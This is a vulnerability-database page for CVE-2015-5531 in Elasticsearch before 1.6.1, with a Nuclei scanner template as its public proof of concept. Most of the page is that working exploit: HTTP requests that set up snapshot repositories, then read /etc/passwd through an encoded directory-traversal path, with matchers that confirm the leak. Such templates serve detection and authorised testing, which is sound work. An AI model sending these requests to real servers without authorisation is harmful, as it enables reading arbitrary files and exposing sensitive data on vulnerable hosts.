CVE-2015-5531: ElasticSearch <1.6.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: ElasticSearch | POC: 已公开

漏洞描述

ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

PoC代码[已公开]

id: CVE-2015-5531

info:
  name: ElasticSearch <1.6.1 - Local File Inclusion
  author: princechaddha
  severity: medium
  description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
    - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
    - https://www.elastic.co/community/security/
    - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-5531
    cwe-id: CWE-22
    epss-score: 0.91581
    epss-percentile: 0.99653
    cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: elasticsearch
    product: elasticsearch
    fofa-query: index_not_found_exception
  tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive,vkev,vuln

http:
  - raw:
      - |
        PUT /_snapshot/test HTTP/1.1
        Host: {{Hostname}}

        {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test"
            }
        }
      - |
        PUT /_snapshot/test2 HTTP/1.1
        Host: {{Hostname}}

        {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
            }
        }
      - |
        GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ElasticsearchParseException
          - Failed to derive xcontent from
          - 114, 111, 111, 116, 58
        condition: and

      - type: status
        status:
          - 400
# digest: 4a0a00473045022076f7dfc2c1f62587cfe274b3e8605adc8c72d950a341914bd2b29b587652c32e022100b89aea63cc087ee55de8c989437695724666c33c2fe3ed3bed94363017187295:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2015/CVE-2015-5531.yaml

相关漏洞推荐